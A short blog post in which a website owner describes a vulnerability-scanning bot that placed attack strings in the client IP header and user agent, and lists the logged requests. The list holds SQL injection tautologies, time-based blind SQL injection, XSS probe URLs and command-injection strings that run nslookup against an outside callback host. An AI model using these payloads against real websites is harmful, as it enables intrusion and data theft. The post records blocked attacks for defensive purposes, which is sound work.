Skip to content

The smarter mal bot/person

  • by

Interesting. I still review and occasionally evolve the protections on a website I made ages ago.

Normally bots vuln scanning are all the same, but recently a more evolved one appeared.

While it still couldn’t get through, below is a snapshot of requests it threw at the site that were detected as malicious.

The interesting thing is that these attempts came not as GET or POST data, but as the client IP (presumably in request headers) and the Useragent..

Fodder for a new type of block. The site currently doesn’t block on these attributes. The bot was just too greedy and attempted to throw malicious GET and POST data at the same time and was blocked on that.

I suppose I could also block on an IP header containing any characters except for 0-9 or a full stop,

Useragents are a bit trickier as they can be all sorts.Best bet there is to continue not to interact with them beyond doing string literal matches for some classic bot UAs.

59401248.test.com
${10000321+9999278}
“.gethostbyname(lc(“hitep”.”gnbgcigbe8bd4.bxss.me.
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
“+”A”.concat(70-3).concat(224).concat(120).concat “;print(md5(31337));$a=” “&&sleep(271000)ktquad&&” ${@print(md5(31337))} ) “||sleep(271000)daeukw||” !(()&&!||| ^(#$!@#$)(()))*
1DDt4clO
<!–
(nslookup -q=cname hithjakuieuax0fb11.bxss.me||cur
$(nslookup -q=cname hituymnytxxdcf974f.bxss.me||cu
|(nslookup -q=cname hitfizvqeokrg615c6.bxss.me||cu
`(nslookup -q=cname hitvpghzgpblt2bd0e.bxss.me||cu
;(nslookup -q=cname hitzurepnhxzgdcf61.bxss.me||cu
XH7Zc
D1fJcQa3
-1 OR 2+690-690-1=0+0+0+1 —
-1 OR 2+519-519-1=0+0+0+1
-1″ OR 2+727-727-1=0+0+0+1 —
0″XOR(if(now()=sysdate()
1 ˤˢ%2527%2522
@@3x1iB

Leave a Reply

Your email address will not be published. Required fields are marked *